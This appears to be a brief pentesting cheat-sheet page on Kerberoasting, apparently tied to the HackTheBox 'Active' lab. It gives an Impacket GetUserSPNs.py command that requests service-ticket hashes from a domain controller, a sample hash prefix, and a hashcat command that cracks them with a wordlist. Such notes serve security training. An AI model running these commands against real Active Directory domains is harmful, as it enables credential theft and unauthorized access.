GetUserSPNs.py

Check in Bloodhound, if the Administrator or other user is Kerberoastable

If kerberoastable, then do below.

GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/svc_tgs

Example

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$

Hashcat 

hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt

Previousimpacket-smbserverNextActive Directory Attacks

Last updated